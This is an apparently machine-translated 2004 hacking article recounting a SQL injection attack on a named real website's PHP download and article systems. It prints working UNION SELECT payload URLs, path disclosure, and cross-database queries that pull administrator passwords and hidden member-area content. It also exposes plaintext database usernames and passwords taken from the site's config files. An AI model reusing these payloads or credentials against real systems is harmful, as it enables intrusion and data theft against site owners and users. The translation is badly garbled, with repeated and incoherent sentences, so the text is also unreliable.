Author: angel article in Nature: Original release date: 2004-09-17 Disclaimer: This article has been published in the "Hacker X Files", reprint please specify. I don't know if you have encountered this situation, I want to get a sensitive information of the PHP MySQL forum of solid gold soup. What should I do? Social engineering? From the host? In fact, everyone can do not have to be so negative, according to our habit of Web safe enthusiasts, then browse to other resources on the site, if there is any other PHP MySQL system has a vulnerability, then we can use a vulnerability system to inject the system of solid gold soup, Just start a truth with the fragile host from the same network segment, just this simple. In this article, I can tell you that the injection in PHP is very different from the injection in the ASP, and it is basically injective, but asp is basically injected, but in PHP, either int type Variables are not filtered, or they can be caused by quotation, or Magic_QUOTES_GPC is turned off, in fact, as long as the injection in PHP can be successfully utilized, there are basically more opportunities to penetrate the host rather than just get WebAdmin. In a few PHPs I wrote, injecting MySQL's article, in fact, it is the same, it is to succeed, but why is separated, because some of the harm is quite big, Given the summer vacation is the peak of the student black station, I decided to publish it later in September, anyway, this kind of thing is to take into account the consequences. Things are still from the member of the Black and White, because I saw a little fun thing, but there is no need to enter the server, it is not a download address, I will see the "foreign new spyware", very Simple things don't have to get too complicated, all downloading addresses in the member zone are all:
http://www.heibai.net/vip/ Estimated here to be observatory, whether it is, look at the following membership login box, it turns out that the user of the article system login entrance, uses article system to store member tools, there is one of the articles there. The classification of the member area, black and white article system is Yminfo, since the host used with other sites, I think all data sheets should be in the same database, query the user table User in the Yminfo, submit :
http://www.heibai.net/down/show.php?id=5174 121, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1% 20FROM% 20User error, actually does not exist, is it true that two web programs do not use the same database? First explosive download system configuration files out (see "Advanced SQL Injection with MySQL", because the audience of the night cat has a vulnerability, it is easy to report the wrong path from the program to get the web absolute path, download The system's configuration file location is:
D: /starkun/down/include/config.inc.php Some content is as follows:
$ dbhost = "localhost"; // Database host name $ dbuser = "Download"; // Database Username $ dbpasswd = "kunstar988"; // Database pass code $ dbname = "download"; // Database name download system is used Download Database, let's take a look at the article system, the location of the article system configuration file is: d: /starkun/article/include/config.inc.php part of the content is as follows:
$ dbhost = "localhost"; // Database host name $ dbuser = "root"; // Database Username $ dbpass = "234ytr8ut"; // Database password $ dbname = "article"; // Database name is true It is different data. Black and white is used to use this trick. I also know that the remote connection of MySQL is prohibited, so I will check the MySQL manual to see what can be used, and I have seen it before leaking. I didn't look at it, I said this in the manual:
You can reference a table in TBL_NAME (in the current database), or specify its data in dbname.tbl_name. You have to reference a column in column or db_name.tbl_name.col_name.col_name.col_name. You don't need to specify a TBL_NAME or DB_NAME.TBL_NAME prefix before the column referenced in a SELECT statement unless there is unity. View Chapter 6.1.2 Database, Table, Index, Column, and Alias For more explicit column reference formats for ambiguous column reference. That is to say, we can query across the library, follow the statement formats above, let's take a look at whether there is a data sheet used in Yminfo in the Article database, submitted:
http://www.heibai.net/down/show.php?id=5174 121, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1% 20FROM% 20Article.user, huh, the page is back, existence, in fact, the cross-library query is as simple, the peace is the same, just joining the database name before the name, but Our things have not yet finished, I have to get what I want, I have to get the administrator's information is very simple, as long as I am familiar with the data structure, it is easy to construct:
Http://www.heibai.net/down/show.php?id=10000 Union Select 1,1, 1, 1, 1, 1, 1, 1, 1, 1 ,password ,1, 1, 1, 1, 1, 1, 1% 20FROM% 20usticle.user% 20where% 20Usergroupid = 1 results are shown in Figure: However, get this is useless, because the program uses session verification, there is no way to deceive, or continue to we Member software information. Too many records, how can I know which infoid is a member of the member? There is a Sortid field in the info table that is the logo record which category is that we will all belong to Sortid = 11 record, see what information is returned, then do it next steps, submit:
http://www.heibai.net/down/show.php?id=10000 Union Select 1 ,TITLE, 1,1, 1, 1, 1, pageText, 1, 1, 1, 1, 1, 1, 1% 20FROM% 20Article.info% 20where% 20Sortid = 11 Haha, actually exploding the call page of the member software, indeed surprising. Haha, actually broke the call page of the member software, indeed surprising. The original black and white member area is also using the night cat to download 1.x.x, and it is a new download system. All member software, without any verification, just a little more. Address is:
http://www.heibai.net/****/newdownload
Things I also report a paragraph here, the article is very simple, it is completely unwind to write, please go to the security angel forum or BST forum to find me.
